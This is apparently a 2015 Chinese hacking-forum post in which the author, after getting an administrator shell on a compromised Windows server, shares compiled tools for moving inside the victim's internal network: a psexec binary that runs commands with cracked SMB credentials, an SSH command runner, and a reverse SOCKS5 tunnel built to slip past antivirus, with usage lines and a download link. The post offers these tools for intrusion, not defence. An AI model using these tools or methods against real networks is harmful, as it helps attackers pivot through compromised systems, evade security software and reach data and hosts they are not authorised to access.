内网渗透几个小工具-T00ls20150804

好久没有发帖了,出来冒泡~
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
一)前言
昨天搞站,shell是windows的administrator权限,但是反弹不出来。所有东西全在命令行上面玩。
凤凰扫描器扫除几个smb和ssh的口令
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
二)小工具
1.psexec.exe
网上传的psexec 在命令行里执行smb命令会弹框框,导致shell卡死。像这样:


找到psexec.py 用pyinstaller转换为二进制文件:
usage:psexec.exe username:password@IP cmd


linux版本psexec等等也进行分享


-------------------------------------------------------------------------------------------------------
2.ssh_cmd.exe
自己用python写的,pyinstaller转换二进制文件:
usage: ssh_cmd.exe [-h] --ip IP --user USERNAME --pass PASSWORD [--port PORT]
                   [--cmd CMD]

ssh commands author: wilson

optional arguments:
  -h, --help       show this help message and exit
  --ip IP          ip
  --user USERNAME  username
  --pass PASSWORD  password
  --port PORT      port
  --cmd CMD        shell command


example:
ssh_cmd.exe --ip 192.168.159.1 --user root --pass 123456 --cmd "ls -al"

--------------------------------------------------------------------------------------------
3.ssock_win.exe
ssock再linux搭建一个socks5服务,非常好用~
详情 看这里 :http://www.freebuf.com/articles/system/12182.html

但是在windows下面,没有这个工具。
相似功能的有htran,昨天就想用htran,搭建socks5进内网。但是杀软屌得不行,htran被杀的很惨。。。。。




于是乎,我将s5.py和rtcp.py拼接一起~~写成了ssocks_win.py  代码有点长,直接给exe吧
usage: ssock_win.exe [-h] --lport LPORT --rhost RHOST --rport RPORT

just like ssock

optional arguments:
  -h, --help     show this help message and exit
  --lport LPORT  build socket5 in this port
  --rhost RHOST  connect this ip
  --rport RPORT  connect this port


--lport是本地开启socks5的端口
--rhost是有外网ip的服务器的地址
--rport是 外网ip的服务器的端口


外网服务器可以用lcx -listen port1 port2 来接受,也可以用rtcp.py来监听。他们是一样

examp:
外网服务器:
lcx -listen port1 port2

内网服务器
ssock_win.exe --lport 10100 --rhost IP --rpo rt  port1





然后你用proxychains或者proxifer 连接IP and port2

----------------------------------------------------------------------------------------------
三)结语
文件看这里:
链接:http://pan.baidu.com/s/1qWLqC24 密码:jyur
1.路径带中文会报错的
2.因为是pyinstaller生成,文件都比较大
3.ssock_win.exe 发包不能太频繁,但是3389还是连的起来的~ 出错以后要重新运行

你可能感兴趣的:(内网渗透几个小工具-T00ls20150804)